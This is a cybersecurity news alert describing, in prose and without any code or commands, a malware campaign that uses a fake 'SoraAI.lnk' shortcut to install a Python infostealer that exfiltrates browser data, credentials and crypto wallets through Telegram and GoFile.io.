Menu

  • Alerts
  • Incidents
  • News
  • APTs
  • Cyber Decoded
  • Cyber Hygiene
  • Cyber Review
  • Cyber Tips
  • Definitions
  • Malware
  • Threat Actors
  • Tutorials

Useful Tools

  • Password generator
  • Report an incident
  • Report to authorities
No Result
View All Result
CTF Hack Havoc
CyberMaterial
  • Education
    • Cyber Decoded
    • Definitions
  • Information
    • Alerts
    • Incidents
    • News
  • Insights
    • Cyber Hygiene
    • Cyber Review
    • Tips
    • Tutorials
  • Support
    • Contact Us
    • Report an incident
  • About
    • About Us
    • Advertise with us
Get Help
Hall of Hacks
  • Education
    • Cyber Decoded
    • Definitions
  • Information
    • Alerts
    • Incidents
    • News
  • Insights
    • Cyber Hygiene
    • Cyber Review
    • Tips
    • Tutorials
  • Support
    • Contact Us
    • Report an incident
  • About
    • About Us
    • Advertise with us
Get Help
No Result
View All Result
Hall of Hacks
CyberMaterial
No Result
View All Result
Home Alerts

Fake Sora AI Lure Installs Infostealer

June 11, 2025
Reading Time: 3 mins read
in Alerts
Fake Sora AI Lure Installs Infostealer

Threat actors are now leveraging the growing popularity of OpenAI’s Sora, a cutting-edge video generation model, to distribute malicious software. This sophisticated malware campaign uses a file disguised as a legitimate shortcut named “SoraAI.lnk” to trick unsuspecting users into infection. This information-stealing malware mimics the branding of Sora to deceive users into initiating a complex, multi-stage attack chain against them. This campaign clearly highlights the increasing use of social engineering tactics to exploit user trust in many well-known AI tools. 

The malicious attack begins with the execution of the shortcut, which then downloads a malicious batch file from a GitHub repository. This script then executes a looped download attempt for additional payloads, ensuring persistence even if any of the initial attempts fail. The subsequent stages of the attack involve the execution of further batch files, which orchestrate the installation of legitimate Python packages. These packages, including requests and cryptography, are ultimately used to run a malicious Python script named “python.py,” the core of the malware. This final script then establishes its persistence on the victim’s computer by placing itself directly in the system’s startup folder. This ensures the malware runs automatically.

The attack begins when a user double-clicks the deceptive “SoraAI.lnk” shortcut file, which then triggers a connection to launch a hidden PowerShell process.

The malware’s primary function is to target and exfiltrate a very wide array of sensitive personal and financial data from the infected computer. It systematically extracts browser cookies, saved passwords, and user profiles from applications like Chrome, Firefox, and also the Opera web browser. Additionally, it actively collects detailed system information, saved Wi-Fi credentials, cryptocurrency wallet details, and also valuable configuration data from popular gaming platforms. The harvested data is then compressed into a zip file and exfiltrated from the system via a Telegram bot API to the attackers. For any larger files that exceed 49MB, the malware uploads them to the external hosting service known as GoFile.io.

This intricate attack chain also actively scavenges for files with many common extensions, such as PDF, JPG, and TXT documents.

It searches for these files in critical directories like the user’s Downloads and Documents folders, amplifying the potential damage to victims. As the digital landscape continues to evolve, distinguishing between legitimate and malicious online resources has now become absolutely paramount for all users. They must exercise extreme caution by downloading files exclusively from trusted sources and verifying authenticity before any execution of unknown files. Staying informed about new cyberattack methodologies and deploying robust antivirus solutions can significantly mitigate the many risks from these campaigns.

Reference:

  • A SoraAI clickbait
Tags: AICyber AlertsCyber Alerts 2025CyberattackCybersecurityJune 2025OpenAISora
ADVERTISEMENT

Related Posts

Malicious Firefox Add Ons Steal Crypto Keys

Malicious Firefox Add Ons Steal Crypto Keys

July 4, 2025
Google Removes 352 ‘IconAds’ Fraud Apps

Google Removes 352 ‘IconAds’ Fraud Apps

July 4, 2025
Browser Cache Attack Bypasses Web Security

Browser Cache Attack Bypasses Web Security

July 4, 2025
Critical Sudo Flaws Expose Linux Systems

Unkillable Mac Malware From North Korea

July 3, 2025
Critical Sudo Flaws Expose Linux Systems

PDFs Deliver QR Codes in Callback Scams

July 3, 2025
Critical Sudo Flaws Expose Linux Systems

Critical Sudo Flaws Expose Linux Systems

July 3, 2025

Latest Alerts

Google Removes 352 ‘IconAds’ Fraud Apps

Malicious Firefox Add Ons Steal Crypto Keys

Browser Cache Attack Bypasses Web Security

PDFs Deliver QR Codes in Callback Scams

Critical Sudo Flaws Expose Linux Systems

Unkillable Mac Malware From North Korea

Subscribe to our newsletter

    Latest Incidents

    Tech Incubator IdeaLab Discloses Data Breach

    Brazil’s CIEE One Exposes 248,000 Records

    McLaughlin & Stern Discloses Data Breach

    Cyberattack Hits Medtech Firm Surmodics

    Rhysida Ransomware Hits German Charity WHH

    Hacker Accesses Max Financial’s User Data

    CyberMaterial Logo
    • About Us
    • Contact Us
    • Jobs
    • Legal and Privacy Policy
    • Site Map

    © 2025 | CyberMaterial | All rights reserved

    Welcome Back!

    Login to your account below

    Forgotten Password?

    Retrieve your password

    Please enter your username or email address to reset your password.

    Log In

    Add New Playlist

    No Result
    View All Result
    • Alerts
    • Incidents
    • News
    • Cyber Decoded
    • Cyber Hygiene
    • Cyber Review
    • Definitions
    • Malware
    • Cyber Tips
    • Tutorials
    • Advanced Persistent Threats
    • Threat Actors
    • Report an incident
    • Password Generator
    • About Us
    • Contact Us
    • Advertise with us

    Copyright © 2025 CyberMaterial